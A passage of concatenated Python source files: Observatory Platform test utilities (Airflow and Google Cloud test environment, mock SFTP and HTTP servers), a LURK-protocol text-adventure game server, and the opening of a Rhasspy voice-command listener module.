list_to_jsonl_gz,
)
from observatory.platform.utils.gc_utils import (
SourceFormat,
bigquery_sharded_table_id,
load_bigquery_table,
upload_files_to_cloud_storage,
)
from observatory.platform.utils.workflow_utils import find_schema
def random_id():
"""Generate a random id for bucket name.
:return: a random string id.
"""
return str(uuid.uuid4()).replace("-", "")
def test_fixtures_path(*subdirs) -> str:
"""Get the path to the Observatory Platform test data directory.
    :return: the Observatory Platform test data directory.
"""
base_path = module_file_path("tests.fixtures")
return os.path.join(base_path, *subdirs)
def find_free_port(host: str = "localhost") -> int:
"""Find a free port.
:param host: the host.
:return: the free port number
"""
with socketserver.TCPServer((host, 0), None) as tcp_server:
return tcp_server.server_address[1]
def save_empty_file(path: str, file_name: str) -> str:
"""Save empty file and return path.
:param path: the file directory.
:param file_name: the file name.
:return: the full file path.
"""
file_path = os.path.join(path, file_name)
open(file_path, "a").close()
return file_path
class ObservatoryEnvironment:
OBSERVATORY_HOME_KEY = "OBSERVATORY_HOME"
def __init__(
self,
project_id: str = None,
data_location: str = None,
api_host: str = "localhost",
api_port: int = 5000,
enable_api: bool = True,
enable_elastic: bool = False,
elastic_port: int = 9200,
kibana_port: int = 5601,
):
"""Constructor for an Observatory environment.
To create an Observatory environment:
env = ObservatoryEnvironment()
with env.create():
pass
:param project_id: the Google Cloud project id.
:param data_location: the Google Cloud data location.
:param api_host: the Observatory API host.
:param api_port: the Observatory API port.
:param enable_api: whether to enable the observatory API or not.
:param enable_elastic: whether to enable the Elasticsearch and Kibana test services.
:param elastic_port: the Elastic port.
:param kibana_port: the Kibana port.
"""
self.project_id = project_id
self.data_location = data_location
self.api_host = api_host
self.api_port = api_port
self.buckets = []
self.datasets = []
self.data_path = None
self.session = None
self.temp_dir = None
self.api_env = None
self.api_session = None
self.enable_api = enable_api
self.enable_elastic = enable_elastic
self.elastic_port = elastic_port
self.kibana_port = kibana_port
self.dag_run: DagRun = None
self.elastic_env: ElasticEnvironment = None
if self.create_gcp_env:
self.download_bucket = self.add_bucket()
self.transform_bucket = self.add_bucket()
self.storage_client = storage.Client()
self.bigquery_client = bigquery.Client()
else:
self.download_bucket = None
self.transform_bucket = None
self.storage_client = None
self.bigquery_client = None
@property
def create_gcp_env(self) -> bool:
"""Whether to create the Google Cloud project environment.
        :return: whether to create the Google Cloud project environment
"""
return self.project_id is not None and self.data_location is not None
def assert_gcp_dependencies(self):
"""Assert that the Google Cloud project dependencies are met.
:return: None.
"""
assert self.create_gcp_env, "Please specify the Google Cloud project_id and data_location"
def add_bucket(self) -> str:
"""Add a Google Cloud Storage Bucket to the Observatory environment.
The bucket will be created when create() is called and deleted when the Observatory
environment is closed.
:return: returns the bucket name.
"""
self.assert_gcp_dependencies()
bucket_name = random_id()
self.buckets.append(bucket_name)
return bucket_name
def _create_bucket(self, bucket_id: str) -> None:
"""Create a Google Cloud Storage Bucket.
:param bucket_id: the bucket identifier.
:return: None.
"""
self.assert_gcp_dependencies()
self.storage_client.create_bucket(bucket_id, location=self.data_location)
def _create_dataset(self, dataset_id: str) -> None:
"""Create a BigQuery dataset.
:param dataset_id: the dataset identifier.
:return: None.
"""
self.assert_gcp_dependencies()
dataset = bigquery.Dataset(f"{self.project_id}.{dataset_id}")
dataset.location = self.data_location
self.bigquery_client.create_dataset(dataset, exists_ok=True)
def _delete_bucket(self, bucket_id: str) -> None:
"""Delete a Google Cloud Storage Bucket.
:param bucket_id: the bucket identifier.
:return: None.
"""
self.assert_gcp_dependencies()
try:
bucket = self.storage_client.get_bucket(bucket_id)
bucket.delete(force=True)
except requests.exceptions.ReadTimeout:
pass
except google.api_core.exceptions.NotFound:
logging.warning(
f"Bucket {bucket_id} not found. Did you mean to call _delete_bucket on the same bucket twice?"
)
def add_dataset(self, prefix: str = "") -> str:
"""Add a BigQuery dataset to the Observatory environment.
The BigQuery dataset will be deleted when the Observatory environment is closed.
:param prefix: an optional prefix for the dataset.
:return: the BigQuery dataset identifier.
"""
self.assert_gcp_dependencies()
if prefix != "":
dataset_id = f"{prefix}_{random_id()}"
else:
dataset_id = random_id()
self.datasets.append(dataset_id)
return dataset_id
def _delete_dataset(self, dataset_id: str) -> None:
"""Delete a BigQuery dataset.
:param dataset_id: the BigQuery dataset identifier.
:return: None.
"""
self.assert_gcp_dependencies()
try:
self.bigquery_client.delete_dataset(dataset_id, not_found_ok=True, delete_contents=True)
except requests.exceptions.ReadTimeout:
pass
def add_variable(self, var: Variable) -> None:
"""Add an Airflow variable to the Observatory environment.
:param var: the Airflow variable.
:return: None.
"""
self.session.add(var)
self.session.commit()
def add_connection(self, conn: Connection):
"""Add an Airflow connection to the Observatory environment.
:param conn: the Airflow connection.
:return: None.
"""
self.session.add(conn)
self.session.commit()
def run_task(self, task_id: str) -> TaskInstance:
"""Run an Airflow task.
:param task_id: the Airflow task identifier.
        :return: the task instance.
"""
assert self.dag_run is not None, "with create_dag_run must be called before run_task"
dag = self.dag_run.dag
run_id = self.dag_run.run_id
task = dag.get_task(task_id=task_id)
ti = TaskInstance(task, run_id=run_id)
ti.dag_run = self.dag_run
ti.init_run_context(raw=True)
ti.run(ignore_ti_state=True)
return ti
@contextlib.contextmanager
def create_dag_run(self, dag: DAG, execution_date: pendulum.DateTime, freeze: bool = True):
"""Create a DagRun that can be used when running tasks.
During cleanup the DAG run state is updated.
:param dag: the Airflow DAG instance.
:param execution_date: the execution date of the DAG.
:param freeze: whether to freeze time to the start date of the DAG run.
:return: None.
"""
# Get start date, which is one schedule interval after execution date
if isinstance(dag.normalized_schedule_interval, (timedelta, relativedelta)):
start_date = (
datetime.fromtimestamp(execution_date.timestamp(), pendulum.tz.UTC) + dag.normalized_schedule_interval
)
else:
start_date = croniter.croniter(dag.normalized_schedule_interval, execution_date).get_next(pendulum.DateTime)
frozen_time = freeze_time(start_date, tick=True)
run_id = "manual__{0}".format(execution_date.isoformat())
# Make sure google auth uses real DateTime and not freezegun fake time
with patch("google.auth._helpers.utcnow", wraps=datetime.utcnow) as mock_utc_now:
try:
if freeze:
frozen_time.start()
state = State.RUNNING
self.dag_run = dag.create_dagrun(
run_id=run_id, state=state, execution_date=execution_date, start_date=pendulum.now("UTC")
)
yield self.dag_run
finally:
self.dag_run.update_state()
if freeze:
frozen_time.stop()
@contextlib.contextmanager
def create(self, task_logging: bool = False):
"""Make and destroy an Observatory isolated environment, which involves:
* Creating a temporary directory.
* Setting the OBSERVATORY_HOME environment variable.
* Initialising a temporary Airflow database.
* Creating download and transform Google Cloud Storage buckets.
* Creating default Airflow Variables: AirflowVars.DATA_PATH, AirflowVars.PROJECT_ID, AirflowVars.DATA_LOCATION,
AirflowVars.DOWNLOAD_BUCKET and AirflowVars.TRANSFORM_BUCKET.
* Cleaning up all resources when the environment is closed.
:param task_logging: display airflow task logging
:yield: Observatory environment temporary directory.
"""
with CliRunner().isolated_filesystem() as temp_dir:
# Set temporary directory
self.temp_dir = temp_dir
# Prepare environment
self.new_env = {self.OBSERVATORY_HOME_KEY: os.path.join(self.temp_dir, ".observatory")}
prev_env = dict(os.environ)
try:
# Update environment
os.environ.update(self.new_env)
# Create Airflow SQLite database
settings.DAGS_FOLDER = os.path.join(self.temp_dir, "airflow", "dags")
os.makedirs(settings.DAGS_FOLDER, exist_ok=True)
airflow_db_path = os.path.join(self.temp_dir, "airflow.db")
settings.SQL_ALCHEMY_CONN = f"sqlite:///{airflow_db_path}"
logging.info(f"SQL_ALCHEMY_CONN: {settings.SQL_ALCHEMY_CONN}")
settings.configure_orm(disable_connection_pool=True)
self.session = settings.Session
db.initdb()
# Setup Airflow task logging
original_log_level = logging.getLogger().getEffectiveLevel()
if task_logging:
# Set root logger to INFO level, it seems that custom 'logging.info()' statements inside a task
# come from root
logging.getLogger().setLevel(20)
# Propagate logging so it is displayed
logging.getLogger("airflow.task").propagate = True
# Create buckets and datasets
if self.create_gcp_env:
for bucket_id in self.buckets:
self._create_bucket(bucket_id)
for dataset_id in self.datasets:
self._create_dataset(dataset_id)
# Add default Airflow variables
self.data_path = os.path.join(self.temp_dir, "data")
self.add_variable(Variable(key=AirflowVars.DATA_PATH, val=self.data_path))
# Add Google Cloud environment related Airflow variables
if self.create_gcp_env:
self.add_variable(Variable(key=AirflowVars.PROJECT_ID, val=self.project_id))
self.add_variable(Variable(key=AirflowVars.DATA_LOCATION, val=self.data_location))
self.add_variable(Variable(key=AirflowVars.DOWNLOAD_BUCKET, val=self.download_bucket))
self.add_variable(Variable(key=AirflowVars.TRANSFORM_BUCKET, val=self.transform_bucket))
# Start elastic
if self.enable_elastic:
elastic_build_path = os.path.join(self.temp_dir, "elastic")
self.elastic_env = ElasticEnvironment(
build_path=elastic_build_path, elastic_port=self.elastic_port, kibana_port=self.kibana_port
)
self.elastic_env.start()
self.dag_run: DagRun = None
# Create ObservatoryApiEnvironment
if self.enable_api:
self.api_env = ObservatoryApiEnvironment(host=self.api_host, port=self.api_port)
with self.api_env.create():
self.api_session = self.api_env.session
yield self.temp_dir
else:
yield self.temp_dir
finally:
# Set logger settings back to original settings
logging.getLogger().setLevel(original_log_level)
logging.getLogger("airflow.task").propagate = False
# Revert environment
os.environ.clear()
os.environ.update(prev_env)
if self.create_gcp_env:
# Remove Google Cloud Storage buckets
for bucket_id in self.buckets:
self._delete_bucket(bucket_id)
# Remove BigQuery datasets
for dataset_id in self.datasets:
self._delete_dataset(dataset_id)
# Stop elastic
if self.enable_elastic:
self.elastic_env.stop()
class ObservatoryTestCase(unittest.TestCase):
"""Common test functions for testing Observatory Platform DAGs"""
def __init__(self, *args, **kwargs):
"""Constructor which sets up variables used by tests.
:param args: arguments.
:param kwargs: keyword arguments.
"""
super(ObservatoryTestCase, self).__init__(*args, **kwargs)
self.storage_client = storage.Client()
self.bigquery_client = bigquery.Client()
# Turn logging to warning because vcr prints too much at info level
logging.basicConfig()
vcr_log = logging.getLogger("vcr")
vcr_log.setLevel(logging.WARNING)
def assert_dag_structure(self, expected: Dict, dag: DAG):
"""Assert the DAG structure.
:param expected: a dictionary of DAG task ids as keys and values which should be a list of downstream task ids.
:param dag: the DAG.
:return: None.
"""
expected_keys = expected.keys()
actual_keys = dag.task_dict.keys()
self.assertEqual(expected_keys, actual_keys)
for task_id, downstream_list in expected.items():
self.assertTrue(dag.has_task(task_id))
task = dag.get_task(task_id)
self.assertEqual(set(downstream_list), task.downstream_task_ids)
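    # Illustrative sketch (not from the original suite; the task ids below are hypothetical):
    # `expected` maps every task id to the ids of its direct downstream tasks, so a simple
    # linear DAG could be checked like this:
    #
    #   self.assert_dag_structure(
    #       {"check_dependencies": ["download"], "download": ["transform"], "transform": []},
    #       dag,
    #   )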
def assert_dag_load(self, dag_id: str, dag_file: str):
"""Assert that the given DAG loads from a DagBag.
:param dag_id: the DAG id.
:param dag_file: the path to the DAG file.
:return: None.
"""
with CliRunner().isolated_filesystem() as dag_folder:
if os.path.exists(dag_file):
shutil.copy(dag_file, os.path.join(dag_folder, os.path.basename(dag_file)))
dag_bag = DagBag(dag_folder=dag_folder)
dag = dag_bag.get_dag(dag_id=dag_id)
self.assertEqual({}, dag_bag.import_errors)
self.assertIsNotNone(dag)
self.assertGreaterEqual(len(dag.tasks), 1)
def assert_blob_exists(self, bucket_id: str, blob_name: str):
"""Assert whether a blob exists or not.
:param bucket_id: the Google Cloud storage bucket id.
:param blob_name: the blob name (full path except for bucket)
:return: None.
"""
# Get blob
bucket = self.storage_client.get_bucket(bucket_id)
blob = bucket.blob(blob_name)
self.assertTrue(blob.exists())
def assert_blob_integrity(self, bucket_id: str, blob_name: str, local_file_path: str):
"""Assert whether the blob uploaded and that it has the expected hash.
:param blob_name: the Google Cloud Blob name, i.e. the entire path to the blob on the Cloud Storage bucket.
:param bucket_id: the Google Cloud Storage bucket id.
:param local_file_path: the path to the local file.
:return: whether the blob uploaded and that it has the expected hash.
"""
# Get blob
bucket = self.storage_client.get_bucket(bucket_id)
blob = bucket.blob(blob_name)
result = blob.exists()
# Check that blob hash matches if it exists
if result:
# Get blob hash
blob.reload()
expected_hash = blob.crc32c
# Check actual file
actual_hash = crc32c_base64_hash(local_file_path)
result = expected_hash == actual_hash
self.assertTrue(result)
def assert_table_integrity(self, table_id: str, expected_rows: int = None):
"""Assert whether a BigQuery table exists and has the expected number of rows.
:param table_id: the BigQuery table id.
:param expected_rows: the expected number of rows.
        :return: None.
"""
table = None
actual_rows = None
try:
table = self.bigquery_client.get_table(table_id)
actual_rows = table.num_rows
except NotFound:
pass
self.assertIsNotNone(table)
if expected_rows is not None:
self.assertEqual(expected_rows, actual_rows)
def assert_table_content(self, table_id: str, expected_content: List[dict] = None):
"""Assert whether a BigQuery table has any content and if expected content is given whether it matches the
actual content. The order of the rows is not checked, only whether all rows in the expected content match
the rows in the actual content.
The expected content should be a list of dictionaries, where each dictionary represents one row of the table,
the keys are fieldnames and values are values.
:param table_id: the BigQuery table id.
:param expected_content: the expected content.
        :return: None.
"""
rows = None
actual_content = None
try:
rows = self.bigquery_client.list_rows(table_id)
actual_content = [dict(row) for row in rows]
except NotFound:
pass
self.assertIsNotNone(rows)
if expected_content is not None:
for row in expected_content:
self.assertIn(row, actual_content)
actual_content.remove(row)
self.assertListEqual(
[], actual_content, msg=f"Rows in actual content that are not in expected content: {actual_content}"
)
def assert_file_integrity(self, file_path: str, expected_hash: str, algorithm: str):
"""Assert that a file exists and it has the correct hash.
:param file_path: the path to the file.
:param expected_hash: the expected hash.
        :param algorithm: the algorithm to use when hashing, e.g. md5 or gzip_crc
:return: None.
"""
self.assertTrue(os.path.isfile(file_path))
if algorithm == "gzip_crc":
actual_hash = gzip_file_crc(file_path)
else:
actual_hash = get_file_hash(file_path=file_path, algorithm=algorithm)
self.assertEqual(expected_hash, actual_hash)
def assert_cleanup(self, download_folder: str, extract_folder: str, transform_folder: str):
"""Assert that the download, extracted and transformed folders were cleaned up.
:param download_folder: the path to the DAGs download folder.
:param extract_folder: the path to the DAGs extract folder.
:param transform_folder: the path to the DAGs transform folder.
:return: None.
"""
self.assertFalse(os.path.exists(download_folder))
self.assertFalse(os.path.exists(extract_folder))
self.assertFalse(os.path.exists(transform_folder))
def setup_mock_file_download(
self, uri: str, file_path: str, headers: Dict = None, method: str = httpretty.GET
) -> None:
"""Use httpretty to mock a file download.
This function must be called from within an httpretty.enabled() block, for instance:
with httpretty.enabled():
self.setup_mock_file_download('https://example.com/file.zip', path_to_file)
:param uri: the URI of the file download to mock.
:param file_path: the path to the file on the local system.
:param headers: the response headers.
:return: None.
"""
if headers is None:
headers = {}
with open(file_path, "rb") as f:
body = f.read()
httpretty.register_uri(method, uri, adding_headers=headers, body=body)
class SftpServer:
"""A Mock SFTP server for testing purposes"""
def __init__(
self,
host: str = "localhost",
port: int = 3373,
level: str = "INFO",
backlog: int = 10,
startup_wait_secs: int = 1,
socket_timeout: int = 10,
):
"""Create a Mock SftpServer instance.
:param host: the host name.
:param port: the port.
:param level: the log level.
        :param backlog: the maximum number of queued connections passed to socket.listen().
:param startup_wait_secs: time in seconds to wait before returning from create to give the server enough
time to start before connecting to it.
"""
self.host = host
self.port = port
self.level = level
self.backlog = backlog
self.startup_wait_secs = startup_wait_secs
self.is_shutdown = True
self.tmp_dir = None
self.root_dir = None
self.private_key_path = None
self.server_thread = None
self.socket_timeout = socket_timeout
def _generate_key(self):
"""Generate a private key.
:return: the filepath to the private key.
"""
key = rsa.generate_private_key(public_exponent=65537, key_size=2048, backend=default_backend())
private_key_path = os.path.join(self.tmp_dir, "test_rsa.key")
with open(private_key_path, "wb") as f:
f.write(
key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption(),
)
)
return private_key_path
def _start_server(self):
paramiko_level = getattr(paramiko.common, self.level)
paramiko.common.logging.basicConfig(level=paramiko_level)
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.settimeout(self.socket_timeout)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
server_socket.bind((self.host, self.port))
server_socket.listen(self.backlog)
while not self.is_shutdown:
try:
conn, addr = server_socket.accept()
transport = paramiko.Transport(conn)
transport.add_server_key(paramiko.RSAKey.from_private_key_file(self.private_key_path))
transport.set_subsystem_handler("sftp", paramiko.SFTPServer, StubSFTPServer)
server = StubServer()
transport.start_server(server=server)
channel = transport.accept()
while transport.is_active() and not self.is_shutdown:
time.sleep(1)
except socket.timeout:
# Timeout must be set for socket otherwise it will wait for a connection forever and block
# the thread from exiting. At: conn, addr = server_socket.accept()
pass
@contextlib.contextmanager
def create(self):
"""Make and destroy a test SFTP server.
:yield: None.
"""
with CliRunner().isolated_filesystem() as tmp_dir:
# Override the root directory of the SFTP server, which is set as the cwd at import time
self.tmp_dir = tmp_dir
self.root_dir = os.path.join(tmp_dir, "home")
os.makedirs(self.root_dir, exist_ok=True)
StubSFTPServer.ROOT = self.root_dir
# Generate private key
self.private_key_path = self._generate_key()
try:
self.is_shutdown = False
self.server_thread = threading.Thread(target=self._start_server)
self.server_thread.start()
# Wait a little bit to give the server time to grab the socket
time.sleep(self.startup_wait_secs)
yield self.root_dir
finally:
# Stop server and wait for server thread to join
self.is_shutdown = True
if self.server_thread is not None:
self.server_thread.join()
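    # Illustrative usage sketch (assumes the StubServer accepts any credentials; paramiko is
    # already imported by this module):
    #
    #   server = SftpServer(port=3373)
    #   with server.create() as root_dir:
    #       transport = paramiko.Transport(("localhost", 3373))
    #       transport.connect(username="test", password="test")
    #       sftp = paramiko.SFTPClient.from_transport(transport)
    #       sftp.listdir(".")  # lists the contents of root_dir
    #       transport.close()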
def make_dummy_dag(dag_id: str, execution_date: pendulum.DateTime) -> DAG:
"""A Dummy DAG for testing purposes.
:param dag_id: the DAG id.
:param execution_date: the DAGs execution date.
:return: the DAG.
"""
with DAG(
dag_id=dag_id,
schedule_interval="@weekly",
default_args={"owner": "airflow", "start_date": execution_date},
catchup=False,
) as dag:
task1 = DummyOperator(task_id="dummy_task")
return dag
@dataclass
class Table:
"""A table to be loaded into Elasticsearch.
:param table_name: the table name.
:param is_sharded: whether the table is sharded or not.
:param dataset_id: the dataset id.
:param records: the records to load.
:param schema_prefix: the schema prefix.
:param schema_folder: the schema path.
"""
table_name: str
is_sharded: bool
dataset_id: str
records: List[Dict]
schema_prefix: str
schema_folder: str
def bq_load_tables(
*,
tables: List[Table],
bucket_name: str,
release_date: DateTime,
data_location: str,
):
"""Load the fake Observatory Dataset in BigQuery.
:param tables: the list of tables and records to load.
:param bucket_name: the Google Cloud Storage bucket name.
:param release_date: the release date for the observatory dataset.
:param data_location: the location of the BigQuery dataset.
:return: None.
"""
with CliRunner().isolated_filesystem() as t:
files_list = []
blob_names = []
# Save to JSONL
for table in tables:
blob_name = f"{table.table_name}.jsonl.gz"
file_path = os.path.join(t, blob_name)
list_to_jsonl_gz(file_path, table.records)
files_list.append(file_path)
blob_names.append(blob_name)
# Upload to Google Cloud Storage
success = upload_files_to_cloud_storage(bucket_name, blob_names, files_list)
assert success, "Data did not load into BigQuery"
# Save to BigQuery tables
for blob_name, table in zip(blob_names, tables):
if table.is_sharded:
table_id = bigquery_sharded_table_id(table.table_name, release_date)
else:
table_id = table.table_name
# Select schema file based on release date
schema_file_path = find_schema(table.schema_folder, table.schema_prefix, release_date)
if schema_file_path is None:
logging.error(
f"No schema found with search parameters: analysis_schema_path={table.schema_folder}, "
f"table_name={table.table_name}, release_date={release_date}"
)
exit(os.EX_CONFIG)
# Load BigQuery table
uri = f"gs://{bucket_name}/{blob_name}"
logging.info(f"URI: {uri}")
success = load_bigquery_table(
uri,
table.dataset_id,
data_location,
table_id,
schema_file_path,
SourceFormat.NEWLINE_DELIMITED_JSON,
)
if not success:
raise AirflowException("bq_load task: data failed to load data into BigQuery")
class HttpServer:
"""Simple HTTP server for testing. Serves files from a directory to http://locahost:port/filename"""
def __init__(self, directory: str):
"""Initialises the server.
:param directory: Directory to serve.
"""
self.directory = directory
self.process = None
self.host = "localhost"
self.port = find_free_port(host=self.host)
self.address = (self.host, self.port)
self.url = f"http://{self.host}:{self.port}/"
@staticmethod
def serve_(address, directory):
"""Entry point for a new process to run HTTP server.
:param address: Address (host, port) to bind server to.
:param directory: Directory to serve.
"""
os.chdir(directory)
server = ThreadingHTTPServer(address, SimpleHTTPRequestHandler)
server.serve_forever()
def start(self):
"""Spin the server up in a new process."""
# Don't try to start it twice.
if self.process is not None and self.process.is_alive():
return
self.process = Process(
target=HttpServer.serve_,
args=(
self.address,
self.directory,
),
)
self.process.start()
def stop(self):
"""Shutdown the server."""
if self.process is not None and self.process.is_alive():
self.process.kill()
self.process.join()
@contextlib.contextmanager
def create(self):
"""Spin up a server for the duration of the session."""
self.start()
try:
yield self.process
finally:
self.stop()
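# Illustrative usage sketch (the directory and file name are hypothetical, and `requests` is
# assumed to be available; any HTTP client works since this is a plain ThreadingHTTPServer):
#
#   server = HttpServer(directory="/tmp/fixtures")
#   with server.create():
#       response = requests.get(server.url + "data.csv")
#       assert response.status_code == 200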
|
game.py
|
from game_components import Character, Room, Loot
# from models import Session, Room, Connection, Monster, Loot
from player import Player
from LURKp import LURKprot
from random import randint
import queue, threading, time, models
class Game:
def __init__(self):
self.settings = {
'landlord': 'Mr. Rowanitz',
'start_stat_limit': 100,
'start_room': 1,
'returning_room': 5,
'stash_player_after': 600
}
self.actions = {
2: self.change_room,
3: self.stage_fight,
4: self.stage_pvp_fight,
5: self.loot,
6: self.start_player,
12: self.stash_player
}
self.rooms = {}
self.players = {}
self.queue = queue.Queue() # Queue of dictionaries to process in game_loop #
self.remove = queue.Queue() # Queue of Player objects to stash on socket error #
self.load_map()
self.lurk = LURKprot()
self.thread = threading.Thread(target = self.game_loop)
self.thread.start()
def load_map(self): ### Loads Rooms, Connections, Monsters, and Lootables from database ###
session = models.Session()
rooms = session.query(models.Room).all()
connections = session.query(models.Connection).all()
monsters = session.query(models.Monster).all()
lootables = session.query(models.Loot).all()
for room in rooms:
number, name, desc = room.id, room.name, room.description
self.rooms[number] = Room(number, name, desc)
for connection in connections:
            room1, room2 = connection.room1, connection.room2
self.rooms[room1].connections.append(room2)
for monster in monsters:
name, attack, defense, regen, health, gold, room, desc = monster.name, monster.attack, monster.defense, monster.regen, monster.health, monster.gold, monster.room, monster.description
self.rooms[room].monsters[name] = Character(name, attack, True, True, True, True, True, defense, regen, health, gold, room, desc)
for lootable in lootables:
room, name, value, rewards, message = lootable.room, lootable.name, lootable.value, lootable.rewards, lootable.message
self.rooms[room].lootables.append(Loot(room, name, value, rewards, message))
def game_loop(self):
while True:
game_queue_size = self.queue.qsize()
if game_queue_size: print('Processing', game_queue_size, 'actions...')
for _ in range(game_queue_size):
                action = self.queue.get() # Returns a tuple of (player.name, message_dict)
                action_type = action[1]['type']
                self.actions[action_type](action)
remove_queue_size = self.remove.qsize()
if remove_queue_size: print('Processing', remove_queue_size, 'removals...')
for _ in range(remove_queue_size):
player, time_added = self.remove.get()
if time.time() - time_added >= self.settings['stash_player_after']:
self.stash_player((player, {}))
def new_conn(self, conn): ### Passes conn to static method LURKprot.decode(), returns success or failure on player creation ###
message_dict = LURKprot.decode(conn = conn)
if message_dict and 'type' in message_dict and message_dict['type'] == 10:
self.new_player(conn, message_dict)
return True
else:
return False
    def new_player(self, conn, characer_dict): ### Checks availability of name or inactive Player object, creates/updates Player or responds with error message ###
name = characer_dict['name']
if name in self.players:
            try: self.players[name].conn.send(bytes(1)) # attempt writing to the socket to see if it's alive
except:
print('Found existing player with broken conn, replacing conn...')
self.players[name].conn = conn
return
error_message = self.lurk.get_err_message(2)
self.lurk.encode(error_message, conn = conn)
# elif player in database: # This will check long-term player storage
else:
            stats_total = sum((characer_dict['attack'], characer_dict['defense'], characer_dict['regen']))
stats_limit = self.settings['start_stat_limit']
if stats_total == stats_limit:
self.players[name] = Player(self, conn, characer_dict = characer_dict)
else:
for stat in ('attack', 'defense', 'regen'): # recalculates each stat as a ratio and multiplies it by the game stat limit #
                    characer_dict[stat] = int(characer_dict[stat] / stats_total * stats_limit)
                stats_total = sum((characer_dict['attack'], characer_dict['defense'], characer_dict['regen']))
                stats_delta = stats_limit - stats_total
                print(stats_delta)
                stats = ('attack', 'defense', 'regen')
                for i in range(stats_delta): # distribute the rounding remainder one point at a time #
                    characer_dict[stats[i % len(stats)]] += 1
self.players[name] = Player(self, conn, characer_dict = characer_dict)
def start_player(self, action): ### Updates player.character to indicate 'started' and adds player to the appropriate room ###
name, message_dict = action
player = self.players[name]
player.character.started = True
player.character.room = self.settings['start_room']
        self.rooms[self.settings['start_room']].players.append(name)
def stash_player(self, action): ### Removes Player object from players and current room, adds or updates player record in long-term storage ###
name, message_dict = action
        fair_well = self.lurk.get_chat_message(self.settings['landlord'], name, 'Sad to see you going so sooooon. Farewell!')
self.players[name].send_queue.put(fair_well)
self.players[name].character.started = False
self.players[name].character.ready = False
self.players[name].active = False
def change_room(self, action): ### Checks that new room is a connection of current room, removes player from current room and adds to new room ###
name, message_dict = action
player = self.players[name]
new_room = message_dict['room']
        current_room = player.character.room
        if new_room in self.rooms[current_room].connections:
            self.rooms[current_room].players.remove(name)
            self.update_room(current_room)
            self.rooms[new_room].players.append(name)
self.update_room(new_room)
player.character.room = new_room
def update_room(self, room): ### Sends updated characters, connections, and other info to all players in room ###
current_room = self.rooms[room].get_dict()
player_characters = [self.players[i].character.get_dict() for i in self.rooms[room].players]
monster_characters = [i.get_dict() for i in self.rooms[room].monsters.values()]
        connecting_rooms = [self.rooms[i].get_dict() for i in self.rooms[room].connections]
for player in self.rooms[room].players:
self.players[player].send_queue.put(current_room)
for update_list in (player_characters, monster_characters, connecting_rooms):
self.players[player].send_queue.put(update_list)
def process_fight(self, room, players_list, monsters_list = None): ### Calculates attack and damage taken for each character's turn, finally calls self.update_room ###
if monsters_list: # whole room fight
for character in players_list: # Each player attacks first
attack = character['attack']
for character in monsters_list:
if character['health'] > 0:
calc_attack = randint(int(attack * 0.75), int(attack * 1.25)) # consider moving this above the for loop if functionality is slow #
damage_taken = calc_attack - character['defense']
self.rooms[room].monsters[character['name']].health -= damage_taken
for character in monsters_list: # Then monsters attack
attack = character['attack']
for character in players_list:
calc_attack = randint(int(attack * 0.5), attack) # consider moving this above the for loop if functionality is slow #
damage_taken = calc_attack - character['defense']
self.players[character['name']].character.health -= damage_taken
else: # pvp fight
player1, player2 = players_list
calc_attack = randint(int(player1['attack'] * 0.75), int(player1['attack'] * 1.25))
damage_taken = calc_attack - player2['defense']
self.players[player2['name']].character.health -= damage_taken
calc_attack = randint(int(player2['attack'] * 0.75), int(player2['attack'] * 1.25))
damage_taken = calc_attack - player1['defense']
self.players[player1['name']].character.health -= damage_taken
self.update_room(room)
def stage_fight(self, action): ### Prepares character list for room, passes characters to calculate_attack ###
name, message_dict = action
room = self.players[name].character.room
if self.rooms[room].monsters:
players_list = self.rooms[room].players.copy()
players_list.remove(name)
players_list.insert(0, name)
players_list = [self.players[i].character.get_fight_stats() for i in players_list]
players_list = [i for i in players_list if i and i['health'] > 0]
            monsters_list = [i.get_fight_stats() for i in self.rooms[room].monsters.values()]
self.process_fight(room, players_list, monsters_list)
else:
message_dict = self.lurk.get_err_message(3)
self.players[name].send_queue.put(message_dict)
def stage_pvp_fight(self, action): ### Commences attack sequence, calculating attack and damage taken for each character's turn, and finally calls self.update_room ###
name, message_dict = action
target = message_dict['name']
room = message_dict['room']
if target in self.rooms[room].players:
players_list = [name, target]
players_list = [self.players[i].character.get_fight_stats() for i in players_list]
self.process_fight(room, players_list)
else:
message_dict = self.lurk.get_err_message(6) # text = 'Target player not in room'
self.players[name].send_queue.put(message_dict)
def loot(self, action):
name, message_dict = action
target = message_dict['name']
if self.players[name].character.room == self.players[target].character.room:
self.players[name].character.gold += self.players[target].character.gold
else:
message_dict = self.lurk.get_err_message(6)
self.players[name].send_queue.put(message_dict)
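# Illustrative flow sketch (the player name and payloads are hypothetical, and the player must
# already exist in game.players): Player objects enqueue (player.name, message_dict) tuples on
# game.queue, and game_loop dispatches each one through self.actions keyed by the 'type' field:
#
#   game = Game()
#   game.queue.put(("alice", {"type": 6}))             # start_player
#   game.queue.put(("alice", {"type": 2, "room": 2}))  # change_room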
|
command_listener.py
|
"""Support for voice command recording."""
import json
import math
import os
import subprocess
import threading
import uuid
from datetime import timedelta
from typing import Any, Dict, List, Optional, Type
import webrtcvad
from rhasspy.actor import RhasspyActor, WakeupMessage
from rhasspy.events import (AudioData, ListenForCommand, MqttMessage,
MqttSubscribe, StartStreaming, StopStreaming,
VoiceCommand)
from rhasspy.utils import convert_wav
# -----------------------------------------------------------------------------
def get_command_class(system: str) -> Type[RhasspyActor]:
"""Return class type for profile command listener."""
assert system in ["dummy", "webrtcvad", "command", "oneshot", "hermes"], (
"Unknown voice command system: %s" % system
)
if system == "webrtcvad":
# Use WebRTCVAD locally
return WebrtcvadCommandListener
if system == "command":
# Use external program
return CommandCommandListener
if system == "oneshot":
# Use one-shot listener locally
return OneShotCommandListener
if system == "hermes":
# Use MQTT listener
return HermesCommandListener
# Use dummy listener as a fallback
return DummyCommandListener
# -----------------------------------------------------------------------------
class DummyCommandListener(RhasspyActor):
"""Always sends an empty voice command."""
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
if isinstance(message, ListenForCommand):
self.send(message.receiver or sender, VoiceCommand(bytes()))
# -----------------------------------------------------------------------------
# webrtcvad based voice command listener
# https://github.com/wiseman/py-webrtcvad
# -----------------------------------------------------------------------------
class WebrtcvadCommandListener(RhasspyActor):
"""Listens to microphone for voice commands bracketed by silence."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.after_phrase: bool = False
self.buffer: bytes = bytes()
